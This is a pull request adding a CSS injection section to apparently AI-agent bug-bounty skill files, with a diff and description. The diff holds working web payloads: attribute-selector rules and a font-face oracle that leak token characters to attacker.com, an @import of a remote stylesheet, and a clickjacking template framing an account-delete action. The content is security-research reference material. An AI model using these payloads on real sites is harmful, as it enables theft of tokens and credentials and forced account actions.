### PR TITLE
feat(vuln-classes): add CSS injection coverage

### DIFF
--- a/skills/security-arsenal/SKILL.md
+++ b/skills/security-arsenal/SKILL.md
@@ -741,7 +741,7 @@ Missing CSP / HSTS / X-Frame-Options / other security headers
 Missing SPF / DKIM / DMARC
 GraphQL introspection alone (no auth bypass, no IDOR)
 Banner / version disclosure without a working CVE exploit
-Clickjacking on non-sensitive pages (no sensitive action in PoC)
+Clickjacking on non-sensitive pages (no sensitive action in PoC) — for working overlay PoC against sensitive action, see web2-vuln-classes **CSS Injection**
 Tabnabbing
 CSV injection (no actual code execution shown)
 CORS wildcard (*) without credential exfil PoC
@@ -772,7 +772,7 @@ These are valid ONLY when combined with a chain that proves real impact:
 | Standalone Finding | Chain Required | Result if Chained |
 |---|---|---|
 | Open redirect | + OAuth code theft via redirect_uri abuse | ATO (Critical) |
-| Clickjacking | + sensitive action + working PoC (not just login) | Medium |
+| Clickjacking | + sensitive action + working PoC (not just login) — see web2-vuln-classes **CSS Injection** for the opacity-overlay template | Medium |
 | CORS wildcard | + credentialed request exfils user data | High |
 | CSRF | + sensitive action (transfer funds, change email) | High |
 | Rate limit bypass | + OTP/token brute force succeeding | Medium/High |

--- a/skills/web2-recon/SKILL.md
+++ b/skills/web2-recon/SKILL.md
@@ -143,6 +143,12 @@ cat /tmp/urls.txt | gf sqli | tee /tmp/sqli-candidates.txt
 cat /tmp/urls.txt | gf redirect | tee /tmp/redirect-candidates.txt
 cat /tmp/urls.txt | gf lfi | tee /tmp/lfi-candidates.txt
 cat /tmp/urls.txt | gf rce | tee /tmp/rce-candidates.txt
+
+# User-controlled CSS surface (themes, profile pages, HTML email renderers,
+# rich-text editors, PDF generators). gf has no pattern for this — grep manually:
+cat /tmp/urls.txt | grep -iE "theme|profile|signature|customize|email|invoice|pdf|render|markdown" \
+  | tee /tmp/css-injection-candidates.txt
+# → if any hit, run web2-vuln-classes **CSS Injection**
 ```
 
 ---

--- a/skills/web2-vuln-classes/SKILL.md
+++ b/skills/web2-vuln-classes/SKILL.md
@@ -1,9 +1,9 @@
 ---
 name: web2-vuln-classes
-description: Complete reference for 21 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples. Covers IDOR, auth bypass, XSS, SSRF (11 IP bypass techniques), SQLi, business logic, race conditions, OAuth/OIDC, file upload (10 bypass techniques), GraphQL, LLM/AI (ASI01-ASI10 agentic framework), API misconfig (mass assignment, JWT attacks, prototype pollution, CORS), ATO taxonomy (9 paths), SSTI (Jinja2/Twig/Freemarker/ERB/Spring), subdomain takeover, cloud/infra misconfigs, HTTP smuggling (CL.TE/TE.CL/H2.CL), cache poisoning, MFA bypass (7 patterns), SAML attacks (XSW/comment injection/signature stripping), error disclosure / debug endpoints (stack trace regex per framework, chain templates). Use when hunting a specific vuln class or studying what makes bugs pay.
+description: Complete reference for 22 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples. Covers IDOR, auth bypass, XSS, SSRF (11 IP bypass techniques), SQLi, business logic, race conditions, OAuth/OIDC, file upload (10 bypass techniques), GraphQL, LLM/AI (ASI01-ASI10 agentic framework), API misconfig (mass assignment, JWT attacks, prototype pollution, CORS), ATO taxonomy (9 paths), SSTI (Jinja2/Twig/Freemarker/ERB/Spring), subdomain takeover, cloud/infra misconfigs, HTTP smuggling (CL.TE/TE.CL/H2.CL), cache poisoning, MFA bypass (7 patterns), SAML attacks (XSW/comment injection/signature stripping), error disclosure / debug endpoints (stack trace regex per framework, chain templates), CSS injection (attribute-selector exfiltration, opacity clickjacking, @import). Use when hunting a specific vuln class or studying what makes bugs pay.
 ---
 
-# WEB2 BUG CLASSES — 21 Classes
+# WEB2 BUG CLASSES — 22 Classes
 
 Root cause, pattern, bypass table, chaining opportunity, real paid examples.
 
@@ -140,6 +140,7 @@ location.href = userInput
 - XSS + CSRF token theft = CSRF bypass on critical action
 - XSS + service worker = persistent XSS across pages
 - XSS + credential theft via fake login form = ATO
+- **No JS allowed?** CSS injection can still exfil tokens via attribute selectors — see **CSS Injection**
 
 ### postMessage Testing
 DOM XSS variant where `window.addEventListener("message", ...)` lacks proper `event.origin` validation. Common on SDK callbacks, OAuth redirect handlers, iframe widgets, chat/analytics scripts — easy to miss because the entry point is **indirect** (no URL parameter, no form field, source-code grep alone doesn't reveal whether the origin check is sound).
@@ -994,4 +995,100 @@ Framework version + public CVE matching              = High–Critical (verify w
 PII / internal IP / hostname in stack trace          = Medium (information disclosure)
 Path disclosure only (no secrets)                    = Low/Info (chain to LFI to upgrade)
 "Yellow page" / "Internal Server Error" generic      = N/A — no signal
+```
+
+---
+
+## 22. CSS INJECTION
+> CSS can exfil data and hijack clicks **without executing JavaScript**. Because CSP targets script execution — not stylesheet rules — CSS injection often survives on sites with strict CSP, making it a high-value residual attack surface. Two primitives combined: (1) attribute selectors match DOM by content, (2) properties like `background: url()` and `@import` fire HTTP requests when matched.
+
+### Where this appears
+| Context | Example targets |
+|---|---|
+| User-customizable CSS / themes | Tumblr, Medium custom CSS, Slack themes, Notion embeds, phpBB themes |
+| HTML email rendering | Gmail, Outlook, Mailchimp (real CVEs across all three) |
+| Forum / CMS rich text | WordPress posts, Confluence custom CSS, MediaWiki user CSS |
+| HTML-to-PDF pipelines | Headless Chrome rendering invoices/reports (CSS runs server-side) |
+| Server-side template injection side-effect | SSTI rendered into `<style>` block; user-controlled `style` attributes |
+| Markdown engines | Some allow `<style>` or `style=` attributes by default |
+
+### Attribute Selector Exfiltration — Core Attack
+Steal a CSRF token / API key / password reset token one character at a time. **Works with no JavaScript, survives strict CSP.**
+
+```css
+/* Round 1 — leak first character of token */
+input[name="csrf"][value^="a"] { background: url(//attacker.com/?c=a) }
+input[name="csrf"][value^="b"] { background: url(//attacker.com/?c=b) }
+input[name="csrf"][value^="c"] { background: url(//attacker.com/?c=c) }
+/* ... 62 rules covering [a-zA-Z0-9] ... */
+```
+
+**Mechanics:**
+1. Victim loads page containing `<input value="abc123def456">`
+2. Browser evaluates all 62 rules — **only one matches** (`value^="a"`)
+3. That match triggers `background: url(...)` → browser fires `GET //attacker.com/?c=a`
+4. Attacker's server log: "first character = `a`"
+5. Round 2: attacker rewrites CSS with `value^="aa"`, `value^="ab"`, ..., `value^="az"` — leaks second character
+6. Token of length N is fully extracted in N rounds (or via more advanced single-pass `:has()` + sibling-selector tricks on modern Chrome)
+
+**Single-character variants:**
+- `[value^="X"]` — prefix
+- `[value$="X"]` — suffix (useful for keystroke logging on `<input>`s)
+- `[value*="X"]` — substring (less precise but works for short alphabets)
+
+### Opacity Clickjacking — Concrete PoC for the "chain" requirement
+Plugin's conditionally-valid table requires "clickjacking + sensitive action + working PoC" — here's the working PoC template:
+
+```html
+<!-- Hosted on attacker.com -->
+<button style="position:absolute;top:50px;left:50px;z-index:1;">Click to win iPhone!</button>
+<iframe src="https://target.com/account/delete?confirm=1"
+        style="position:absolute;top:50px;left:50px;
+               width:200px;height:50px;
+               opacity:0;z-index:9999;"></iframe>
+```
+
+The transparent iframe sits *over* the visible button. Victim sees "win iPhone" and clicks — actually clicks the delete-account confirm button on target.com under their logged-in session. Adjust `top/left/width/height` to overlay the exact sensitive control (transfer button, change-email submit, OAuth consent "Approve").
+
+**Verification checklist for the PoC:**
+- [ ] X-Frame-Options not set OR set to `ALLOWALL`
+- [ ] CSP `frame-ancestors` not set OR includes wildcard / attacker domain
+- [ ] Target action requires only a click (no second confirmation)
+- [ ] Logged-in cookies are `SameSite=None` or omitted → cross-site iframe still authenticated
+
+### `@import` — Attacker-Controlled Stylesheet
+If a sanitizer strips `<script>` but allows `@import` or `url()` in user CSS, the attacker pulls in an arbitrary remote stylesheet:
+
+```css
+@import url(https://attacker.com/evil.css);
+```
+
+Now attacker controls **all** styling on the page: overlay phishing forms, hide warning banners, reposition cancel/confirm buttons, etc.
+
+### Font-Based Character Oracle (rare but real)
+Use `unicode-range` in `@font-face` to detect whether a specific Unicode character is present, triggering a download only if so. Each fired font request = "this character is present." Useful for leaking short data (PINs, OTP digits visible in the DOM).
+
+```css
+@font-face { font-family: x; src: url(//attacker.com/?d=5);
+             unicode-range: U+0035; }  /* fires only if "5" rendered on page */
+```
+
+### Chains That Pay
+```
+Attribute selector + CSRF token form  -> token exfil -> CSRF on sensitive action  High
+Attribute selector + input[type=password] (rendered)  -> credential exfil partial  High
+Opacity clickjacking + transfer/delete/email-change   -> account compromise        Medium/High
+@import + phishing form overlay                       -> credential theft          High
+Font side-channel + short rendered data (PIN/OTP)     -> character oracle          Low–Medium (chain)
+CSS injection with no exfil/overlay path              -> N/A standalone
+```
+
+### Triage
+```
+Attribute selector exfils real sensitive data (token/password/SSN)     = High
+@import or full stylesheet control + working phishing PoC              = High
+Opacity overlay + completes a sensitive action in PoC                  = Medium/High
+Only cosmetic CSS allowed (no url()/@import) + no exfil path           = N/A
+url() blocked but transforms/positioning allowed                       = Info (clickjacking-only chain)
+HTML email CSS rendering with rendered attacker styles                 = Medium (case-by-case)
 ```


### PR DESCRIPTION
## What this adds

A new section in `web2-vuln-classes/SKILL.md` covering **CSS injection** — a bug class the plugin's existing 20 sections don't cover. CSS injection is high-value because **CSP targets script execution, not stylesheet rules**, so it often survives on sites with strict CSP as a residual attack surface.

Currently `security-arsenal/SKILL.md` rejects standalone clickjacking and conditionally accepts "clickjacking + sensitive action + working PoC = Medium" — but provides no working PoC template. This PR fills that gap and adds the data-exfil primitive plugin currently misses entirely.

### Section contents
- **Where this appears** — context table (user CSS / HTML email / forum rich text / HTML-to-PDF / SSTI side-effect / markdown engines)
- **Attribute-selector exfiltration** — the core JS-less attack, leak tokens one character at a time via `input[value^="x"] { background: url(...) }`. Survives strict CSP.
- **Opacity-clickjacking working PoC** — drop-in HTML+CSS overlay template targeting `target.com/account/delete?confirm=1`, with a verification checklist (X-Frame-Options, frame-ancestors, SameSite cookie behaviour)
- **`@import` attacker-controlled stylesheet** — when sanitisers strip `<script>` but allow `@import`/`url()`
- **Font-based character oracle** — `@font-face` + `unicode-range` for short rendered data (PIN / OTP)
- **Chains That Pay** table in the same shape as the conditionally-valid table in security-arsenal
- **Triage** rules consistent with the existing always-rejected list

### Workflow hooks
Cross-references at four decision points so the new content fires:

| File | Where | What |
|---|---|---|
| `security-arsenal` always-rejected list | "Clickjacking on non-sensitive pages" entry | Points to opacity-overlay PoC template for the chained variant |
| `security-arsenal` conditionally-valid table | "Clickjacking + sensitive action + PoC" row | Points to the section for the actual overlay template |
| `web2-vuln-classes` section 3 (XSS chains) | After existing chain list | Adds "No JS allowed? CSS injection can still exfil tokens" pointer |
| `web2-recon` attack-surface-triage | After gf patterns block | Adds grep recipe for user-controlled CSS surface (theme / profile / email / invoice / pdf / markdown) |

### Why this matters
Three real-bounty paths the existing material currently underplays:
1. **Strict-CSP sites** — when CSP blocks all script execution, attribute-selector CSS exfil is often the **only** remaining data-leak primitive. Coinbase 2020 paid \$10K for exactly this kind of finding.
2. **HTML email renderers** — Gmail, Outlook, and Mailchimp have repeatedly paid for HTML email CSS exfil, because email engines render CSS but block JS by design.
3. **Working clickjacking PoC gap** — the existing conditionally-valid table requires "+ sensitive action + working PoC" but never shows what that PoC looks like. This PR provides the template.

### Non-changes
- No new commands
- No new skills
- No new tool scripts
- No external dependencies

### File-level changes
- `skills/web2-vuln-classes/SKILL.md` — +99 lines (new section + XSS-chains pointer + frontmatter description extension + header count fix)
- `skills/security-arsenal/SKILL.md` — 2 row extensions (always-rejected + conditionally-valid pointers)
- `skills/web2-recon/SKILL.md` — +6 lines (CSS-injection surface grep recipe under gf patterns)

### Notes on parallel PR
This PR and #47 (error disclosure / debug endpoints) both branched off the same upstream/main state and both number their new section as "Section 21". Whichever merges first, the other will need a quick rebase to renumber. Happy to handle the rebase on request.